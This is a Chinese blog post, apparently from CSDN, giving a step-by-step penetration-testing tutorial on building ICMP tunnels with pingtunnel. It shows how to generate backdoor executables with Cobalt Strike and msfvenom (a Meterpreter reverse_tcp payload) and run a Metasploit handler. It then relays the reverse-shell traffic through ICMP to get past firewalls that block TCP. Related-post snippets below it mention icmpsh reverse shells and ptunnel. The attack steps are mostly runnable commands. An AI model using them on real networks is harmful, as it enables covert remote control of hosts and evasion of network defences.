内网渗透——ICMP隧道搭建

已于 2023-07-11 17:54:25 修改
阅读量370 收藏 4
点赞数 1
文章标签: 网络 tcp/ip 安全
于 2023-07-11 17:52:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65544268/article/details/131660631
版权

目录

一、背景

 二、实现ICMP步骤

 2.1 CS实现ICMP隧道搭建

2.2 MSF实现ICMP隧道搭建

一、背景

防火墙限制了TCP数据包的出入站,在这样的背景下,我们可以将TCP的数据包伪装成ICMP、DNS、SMB的数据包。

本文将对ICMP来进行搭建隧道。

 二、实现ICMP步骤

 2.1 CS实现ICMP隧道搭建

1)首先在CS上启动两个监听器,一个负责监听被攻击主机的3333端口,一个负责监听攻击主机的2222端口

 攻击主机

被攻击主机

2)生成后门程序

 注:payload要选择被攻击主机的监听器

 3)启动pingtunnel服务端【在kali启动】

进入到pingtunnel文件夹,启动服务端

./pingtunnel -type server

4)启动pingtunnel客户端【在客户端启动】

进入到pingtunnel文件夹,启动客户端

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 172.16.100.108 -t 172.16.100.222:2222 -tcp 1 -noprint 1 -nolog 1

5)运行后门程序

 完成主机上线。

2.2 MSF实现ICMP隧道搭建

1)生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe>/home/share/3333.exe

 2)创建监听器

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 2222

 3)搭建隧道,启动服务端

./pingtunnel -type server

4)启动客户端

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 172.16.100.108 -t 172.16.100.108:2222 -tcp 1 -nopirnt 1 -nolog 1

5)运行后门程序

先运行后门程序,之后msf控制台执行命令run

完成主机上线。

LVzuiSuai
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比         -m0 存储 添加到压缩文件时不压缩文件。         -m1 最快 使用最快方式(低压缩)         -m2 较快 使用快速压缩方式         -m3 标准 使用标准(默认)压缩方式         -m4 较好 使用较好压缩方式(较好压缩,但是慢)         -m5 最好 使用最
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 1267
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
内网渗透(二)——ICMP隧道搭建
qq_61562251的博客
12-10 535
ICMP隧道防⽕墙没有开放任何端⼝,但是icmp消息不使用端口号,而是通过IP头部中的协议字段来识别。在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。1、工具:pingtunnelimcptunnel可以将IP流量封装进ICMP的ping数据包中,旨在利用ping穿透防火墙的检测,因为通常防火墙是不会屏蔽ping数据包的。
利用icmp隧道构建ssh通信
f_zhangwuji的博客
09-23 341
利用icmp隧道构建ssh通信 A:192.168.16.144 B:192.168.16.137 C:192.168.16.137 A是攻击机,B是边界,C是内网机。A和B之间有防火墙。现在通过配置后使A可以ssh访问到C。 1.B上配置: ptunnel -s开启ptunnel服务端模式 2.A上配置: ptunnel -p 192.168.16.137 -lp 2019 -da 192.168.16.142 -dp 22 -p:指向跳板机的地址 -lp:指向本地监听端口 -da:指向受害机地址 -d
【内网流量操控技术七】pingtunnel建立icmp隧道
redwand的博客
02-14 1072
前面学习了icmpsh穿透防火墙仅允许icmp协议下的相关配置,我们发现,icmpsh还是有些不足。第一,不能跨平台,其客户端只有icmpsh.exe针对windows的二进制文件,遇到靶机是*inux环境无法使用。第二,icmpsh本质上还不是一个隧道,只是一个反弹shell。第三,icmpsh没有密码认证机制,shell很可能被盗用。因此,有必要再动手将另一icmp常用工具pingtunnel再实验一遍。
icmp隧道搭建(pingtunnel的使用)
dzqxwzoe的博客
08-09 605
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。随手输了个root root检测,没想到真的是(靶场嘛,比较简单,大家勿喷哈~)
icmptunnel搭建icmp隧道——手把手操作
huayimy的博客
07-11 283
环境搭建:攻击机kali2022版服务端受害机kali2023版(客户端)首先我们在攻击机和受害机都需要1、安装下icmptunnel,2、把系统的icmp回显禁用掉,命令如下。3、进入目录中后,输入make进行编译。
icmp端口_pingtunnel搭建icmp隧道
weixin_39793420的博客
11-24 311
说明pingtunnel可以将udp、tcp、sock5流量伪装成icmp传输,地址:https://github.com/esrrhs/pingtunnel/,详细说明和用法可参考官方说明。示例图客户端运行在攻击机,服务端运行在受害机。情况如下:通过pingtunnel搭建一个vps到目标web服务器的隧道,然后利用这个隧道去访问内网的其他机器。(PS:本地搭建虚拟机来模拟现实环境)过...
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 731
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
icmp端口_icmptunnel搭建icmp隧道——超详细步骤
xwj1590的博客
12-08 1296
环境搭建: 攻击机kali:192.168.159.129 受害机centos:192.168.159.10 首先我们在攻击机和受害机都需要安装下icmptunnel,并把系统的icmp回显禁用掉,命令如下。 git clone https://github.com/jamesbarlow/icmptunnel.git cd icmptunnel-master echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all...
我所了解的内网渗透——内网渗透知识大总结 作者:未知.pdf
04-08
我所了解的内网渗透——内网渗透知识大总结 作者:未知
域渗透——PassTheHash&PassTheKey
02-26
对于PassTheHash大家应该都很熟悉,在2014年5月发生了一件有趣的事。微软在2014年5月13日发布了针对PassTheHash的更新补丁kb2871997,标题为“UpdatetofixthePass-...域控:域内主机:在上篇LAPS中提到,如果内网主机的
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
ICMP隧道搭建
weixin_45007073的博客
04-09 986
概述 ICMP隧道简单、实用,是一个比较特殊的协议。最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的ICMP请求。在一些网络环境中,如果攻击者使用各类上层隧道(HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙,实现不受限制的网络访问。 攻击演示 这里我们使用icmpsh这款工具完成演示,这个工具的下载地址为https://git
Pingtunnel使用ICMP协议搭建隧道
m0_53294316的博客
11-20 258
Pingtunnel使用ICMP协议搭建隧道
网络隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6060
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
通过 ICMP 协议实现 Ping Tunnel 建立可穿透网络隧道
林兴陆
04-26 7141
Twitter via Ping Tunnel周四 Cola 没去幼儿园,中午带着他去 KFC 吃东西。回来的时候小林指着西总布胡同说走这条路回去还是原路返回,他说还是...
Rust - TCP Server
最新发布
Ez Lake
05-09 615
内容来自:软件工艺师 - Rust Web 全栈开发教程【完结】修改文件 tcpserver – src –修改文件 tcpclient – src –伊织 2024-05-09(四)凌晨。删掉原来的内容,配置。
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值